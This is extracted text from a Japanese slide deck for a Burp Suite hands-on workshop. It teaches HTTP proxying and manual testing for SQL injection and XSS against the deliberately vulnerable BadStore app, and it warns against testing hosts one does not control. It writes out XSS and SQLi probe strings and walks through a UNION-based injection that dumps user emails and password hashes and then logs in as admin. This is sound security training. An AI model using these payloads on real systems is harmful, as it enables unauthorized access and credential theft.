Slide 1
Slide 1 text
インストールできてますか?
Burp suite
JAVA 8
ブラウザ (推奨:Firefox)
(推奨:アドオン foxyproxy)
Slide 2
Slide 2 text
@madamadaikeru22
Kobe
Vulnerability
AssessmenT
Slide 3
Slide 3 text
神戸脆弱性診断の会 #2
Burp suite ハンズオン
Slide 4
Slide 4 text
注意事項
Slide 5
Slide 5 text
絶対に、自分の管理下にないホストには脆弱性検
査を実行してはいけません。
www
www
www
Slide 6
Slide 6 text
桝谷 昌史 (ますたに まさふみ)
神戸デジタル・ラボ
セキュリティソリューション事業部
Masafumi Masutani
@madamadaikeru22
Slide 7
Slide 7 text
報告
速報
実施
事前確認
見積もり
Slide 8
Slide 8 text
報告
速報
実施
事前確認
見積もり
Slide 9
Slide 9 text
HTTP通信
Slide 10
Slide 10 text
HTTP Request
Slide 11
Slide 11 text
Webページへのアクセス
Slide 12
Slide 12 text
実際にはHTTPと呼ばれるプロトコルを使用して通信をしています
Slide 13
Slide 13 text
HTTPリクエストは3つに分けることができる。
リクエストライン
メッセージヘッダ
メッセージボディ
GET / HTTP/1.1
メソッド リクエストURL プロトコルバージョン
Slide 14
Slide 14 text
(参考)HTTP基礎入門
https://www.slideshare.net/BurpSuiteJapanUserGr/burpsuitejapanhttp
Slide 15
Slide 15 text
No content
Slide 16
Slide 16 text
Burp suite free edition
PortSwigger社が開発したProxyツールで無料版(free
edition)と有料版(pro)があり、有料版には動的スキャン
機能など使用可能になる
無料版はHTTP通信を確認し、改ざんするProxy機能が
利用できます
Slide 17
Slide 17 text
ブラウザ サーバ
HTTPリクエスト
HTTPレスポンス
ブラウザ サーバ
リクエスト
レスポンス
プロキシ
改変した
リクエスト
レスポンス
通常の挙動
Burpを使用する場合
プロキシ機能によってリクエストを改変し脆弱性を確認する
ブラウザの通常操作では出来ないリクエストを試行できる
Slide 18
Slide 18 text
No content
Slide 19
Slide 19 text
No content
Slide 20
Slide 20 text
No content
Slide 21
Slide 21 text
No content
Slide 22
Slide 22 text
No content
Slide 23
Slide 23 text
No content
Slide 24
Slide 24 text
No content
Slide 25
Slide 25 text
検証サイト
Slide 26
Slide 26 text
BadStore
脆弱性スキャンツールのテストあるいは脆弱性内容の学習を目
的として、意図的に脆弱性が作り込まれたWebアプリケーション
Slide 27
Slide 27 text
箱庭BadStore burp extension
https://github.com/ankokuty/HakoniwaBadStore
Slide 28
Slide 28 text
箱庭BadStore burp extension
Slide 29
Slide 29 text
No content
Slide 30
Slide 30 text
No content
Slide 31
Slide 31 text
動作不良時の対応
何かがうまくいかないときは、/cgi-bin/initdbs.cgiにアクセスしてデータベース
をリセットしてください。
一時ディレクトリ(C:¥Users¥{user}¥AppData¥Local¥Temp¥.badstore¥da
ta)を削除し、Hakoniwa BadStoreサーバーを再起動します。
Slide 32
Slide 32 text
(参考)The Broken Web Applications
BWA (The Broken Web Applications) プロジェクトは、
既知の脆弱性を持ったいろいろなアプリケーションを
稼働させる仮想マシンを提供します。
・Webアプリケーションのセキュリティを学びたい
・自動診断ツールをテストしたい
・ソースコード分析ツールをテストしたい
・WAFや、それに類するコード技術をテストしたい
など
https://sourceforge.net/projects/owaspbwa/files/1.2/
Slide 33
Slide 33 text
VM内容
1. トレーニング・アプリケーション
特定の脆弱性毎に学べるようにガイドしてくれるWebアプリケーションです。
2. 現実的で意図的に脆弱なアプリケーション
現実的なWebアプリケーションに見える
Webアプリケーション(実際は幅広い脆弱性を持っている)です。
3. 実際のアプリケーションの古いバージョン
既知の問題を持ったオープンソースアプリケーションです。
Slide 34
Slide 34 text
VM内容
4. ツールテストのためのアプリケーション
Webアプリケーション・セキュリティ・スキャナのような
自動化ツールをテストするためのアプリケーションです。
5. ページもしくは小さなアプリケーションのデモ
特定のコンセプトをデモするために、脆弱性を持たせた
小さなアプリケーションです。
6. OWASP デモ・アプリケーション
OWASPアプリケーションのデモで、脆弱性は持っていません。
Slide 35
Slide 35 text
プロキシ機能
Slide 36
Slide 36 text
ブラウザのプロキシ
Slide 37
Slide 37 text
No content
Slide 38
Slide 38 text
No content
Slide 39
Slide 39 text
No content
Slide 40
Slide 40 text
No content
Slide 41
Slide 41 text
No content
Slide 42
Slide 42 text
パラメータ値の改ざん
Slide 43
Slide 43 text
No content
Slide 44
Slide 44 text
No content
Slide 45
Slide 45 text
No content
Slide 46
Slide 46 text
intruder機能
Slide 47
Slide 47 text
様々な診断タスクを自動化できる機能
・予め登録した診断パターンを自動的に送信し、レスポンスの中から不審
な挙動を探し出す
・ID番号を順に変化させながら送信し、レスポンスに含まれるデータ収集
する
・ユーザー名とパスワードのリストを用意し、認証機能に対して全ての組み
合わせを試す
intruder
Slide 48
Slide 48 text
No content
Slide 49
Slide 49 text
No content
Slide 50
Slide 50 text
No content
Slide 51
Slide 51 text
No content
Slide 52
Slide 52 text
repeater機能
Slide 53
Slide 53 text
No content
Slide 54
Slide 54 text
No content
Slide 55
Slide 55 text
No content
Slide 56
Slide 56 text
脆弱性
Slide 57
Slide 57 text
SQLインジェクション
SQLインジェクションとは、データベースと連動したWebサ
イトで、データベースへの問い合わせや操作を行うプロ
グラムにパラメータとしてSQL文の断片を与えることによ
り、データベースを改ざんしたり不正に情報を入手される
ような脆弱性。
Slide 58
Slide 58 text
XSS
クロス・サイト・スクリプティング(XSS)とは、利用者がWeb
サイトにアクセスした際に、意図しない不正なJavaスクリ
プトコードなどを実行されてしまう脆弱性である。
Slide 59
Slide 59 text
ハンズオン
Slide 60
Slide 60 text
注意事項
Slide 61
Slide 61 text
絶対に、自分の管理下にないホストには脆弱性検
査を実行してはいけません。
www
www
www
Slide 62
Slide 62 text
脆弱性診断ガイドライン
このガイドラインは脆弱性診断士スキルマッププロジェクトによって
作成されました。
Webアプリケーションの脆弱性診断は、自動診断ツールを使った脆
弱性診断だけでは不十分であると言われています。
一定レベルの手動診断による脆弱性診断を行うため、最低限必要
な診断項目や手順を定義しているガイドラインです。
Slide 63
Slide 63 text
脆弱性診断士スキルマッププロジェクト
特定非営利活動法人日本ネットワークセキュリティ協会(JNSA)の日
本セキュリティオペレーション事業者協議会(ISOG-J)のセキュリティ
オペレーションガイドラインWG(WG1)と、OWASP Japan主催の共同
ワーキンググループ
脆弱性診断を行う個人の技術的な能力を具体的にすべく、脆弱性
診断を行う技術者(以下、脆弱性診断士)のスキルマップと学習の指
針となるシラバス、脆弱性診断を行うためのガイドラインを整備して
います。
https://www.owasp.org/index.php/Pentester_Skillmap_Project_JP
Slide 64
Slide 64 text
情報セキュリティサービス基準
Slide 65
Slide 65 text
情報セキュリティサービス基準
たくさんのセキュリティサービスが普及している中、セキュリティの専
門知識をもたないサービス利用者がいる
サービス事業者を選定しなければいけないとき、サービス品質を判
断することが難しい
じゃあ良いサービスの基準をわかり易くまとめたので、これ使って!
Slide 66
Slide 66 text
情報セキュリティサービス基準
Slide 67
Slide 67 text
診断基準
Slide 68
Slide 68 text
WebAppPentestGuidelines.pdf
https://github.com/ueno1000/WebAppPentestGuidelines/raw/maste
r/WebAppPentestGuidelines.pdf
Slide 69
Slide 69 text
SQLインジェクション
Slide 70
Slide 70 text
SQLインジェクション(マニュアル診断)
・問題点
トップページの検索機能においてSQLi
が見つかりました。
・対象パラメータ
searchquery
Slide 71
Slide 71 text
SQLインジェクション(マニュアル診断)
・検証方法
入力値 脆弱性あり 脆弱性なし
'(シングルクォート) DB関連のエラーが表示されるか、正
常動作と挙動が異なる
DB関連のエラーは表示されない
''(シングルクォート2つ) DB関連のエラーは表示されない DB関連のエラーは表示されない
入力値 結果
正規値
※例:Snake Oil
検索結果が表示される。
正常動作を確認しておくことが重要
※この診断手法の脆弱性の有無については確定ではなく、あくまで可能性を示唆するものである
Slide 72
Slide 72 text
「'」 「''」
Slide 73
Slide 73 text
SQLインジェクション(マニュアル診断)
・検証方法
入力値 結果
正規値
※例:Snake Oil
検索結果が表示される。
正常動作を確認しておくことが重要
入力値 脆弱性あり 脆弱性なし
(元の値:文字列)' and
'a'='a'
正常系の動作と比較して同一のレス
ポンスとなる
正常系の動作と比較して異なるレスポン
スとなる
(元の値:文字列)' and
'a'='b'
正常系の動作と比較して異なるレス
ポンスとなる
正常系の動作と比較して異なるレスポン
スとなる
Slide 74
Slide 74 text
「' or 'a'='a' --」 「' or 'a'='b' --」
Slide 75
Slide 75 text
XSS
Slide 76
Slide 76 text
反射型XSS
・問題点
トップページの検索機能において反射
型のXSSが見つかりました。
・対象パラメータ
searchquery
Slide 77
Slide 77 text
反射・格納型XSS(マニュアル診断)
・検証方法
入力値 結果
正規値
※例:Snake Oil
検索結果が表示される。
正常動作を確認しておくことが重要
入力値 脆弱性あり 脆弱性なし
">'>XSS 検出パターンが適切にエスケープされ
ずに挿入される
検出パターンが適切にエスケープされ
て挿入される
alert(1) 検出パターンが適切にエスケープされ
ずに挿入される
検出パターンが適切にエスケープされ
て挿入される
javascript:alert(1) URI属性やjavascriptコード等に挿入され、
javascriptスキームとして有効になる
javascriptスキームとして有効にならな
い
'+alert(1)+' 検出パターンが適切にエスケープされ
ずに挿入される
検出パターンが適切にエスケープされ
て挿入される
"onmouseover="alert(1) 検出パターンが適切にエスケープされ
ずに挿入される
検出パターンが適切にエスケープされ
て挿入される
Slide 78
Slide 78 text
DomBasedXSS(マニュアル診断)
・検証方法
入力値 結果
正規値
※例:Snake Oil
検索結果が表示される。
正常動作を確認しておくことが重要
入力値 脆弱性あり 脆弱性なし
#">'>
スクリプトが実行される スクリプトが実行されない
Slide 79
Slide 79 text
「alert(1);」
Slide 80
Slide 80 text
診断開始
Slide 81
Slide 81 text
No content
Slide 82
Slide 82 text
パラメータ 入力値 診断結果
name alert(1) XSSの脆弱性あり
email alert(1) XSSの脆弱性あり
comments alert(1) XSSの脆弱性あり
Slide 83
Slide 83 text
No content
Slide 84
Slide 84 text
パラメータ 入力値 診断結果
email ' or 'a'='a' -- SQLiの脆弱性あり
email alert(1) XSSの脆弱性あり
Slide 85
Slide 85 text
No content
Slide 86
Slide 86 text
intruderをつかってみる
Slide 87
Slide 87 text
No content
Slide 88
Slide 88 text
No content
Slide 89
Slide 89 text
No content
Slide 90
Slide 90 text
No content
Slide 91
Slide 91 text
No content
Slide 92
Slide 92 text
No content
Slide 93
Slide 93 text
No content
Slide 94
Slide 94 text
No content
Slide 95
Slide 95 text
No content
Slide 96
Slide 96 text
No content
Slide 97
Slide 97 text
問題
Slide 98
Slide 98 text
問題
Q. 管理者ユーザでログインせよ。
Slide 99
Slide 99 text
正常動作
searchquery=test
Slide 100
Slide 100 text
エラー
searchquery=a
Slide 101
Slide 101 text
カラム数
searchquery=' union select 1,2,3,4,5 --
Slide 102
Slide 102 text
カラム数
searchquery=' union select 1,2,3,4 --
Slide 103
Slide 103 text
sqlite_master
sqlite_masterテーブルは、データベースファイル毎に一つだけ生成されます。
カラム名 内容
type オブジェクトタイプ
"table", "index", "trigger", "view"のいずれかが格納される
name オブジェクトの名前
typeが"table"もしくは"view"の場合はtbl_nameと一致する
tbl_namerootpage オブジェクトが所属するテーブルの名前
sql オブジェクトを生成する際に実行されたSQL文(CREATE TABLE,
CREATE INDEX, CREATE VIEW, CREATE TRIGGER等)が格納される
Slide 104
Slide 104 text
テーブル名とカラム名
searchquery= 'union select 0,name,sql,4 from sqlite_master --
Slide 105
Slide 105 text
userdbテーブル
Slide 106
Slide 106 text
ユーザ情報
searchquery='union select 0,email,passwd,4 from userdb --
Slide 107
Slide 107 text
ハッシュ値
email「admin」のpasswd「5EBE2294ECD0E0F08EAB7690D2A6EE69」を取得するが、
そのままログインしても失敗するのでパスワードのハッシュ化を疑います。
ハッシュクラッキングサイトを使用して元の値を探します。
https://hashtoolkit.com/
Slide 108
Slide 108 text
管理者ログイン成功
Slide 109
Slide 109 text
まとめ
Slide 110
Slide 110 text
脆弱性診断のツールを紹介しましたが、
ツールの使い方ができたからと言って
「診断ができる」わけではありません。
脆弱性検証技術は個人差があるため
常に精進することが必要!!
Slide 111
Slide 111 text
ご清聴ありがとうございました。
■神戸脆弱性診断の会
・勉強会告知
フェイスブックグループ
https://www.facebook.com/groups/1407869585989208/
Slackグループ
https://kobevat.slack.com
・勉強会記事
はてなブログ
http://madamadaikeru222san.hatenablog.com/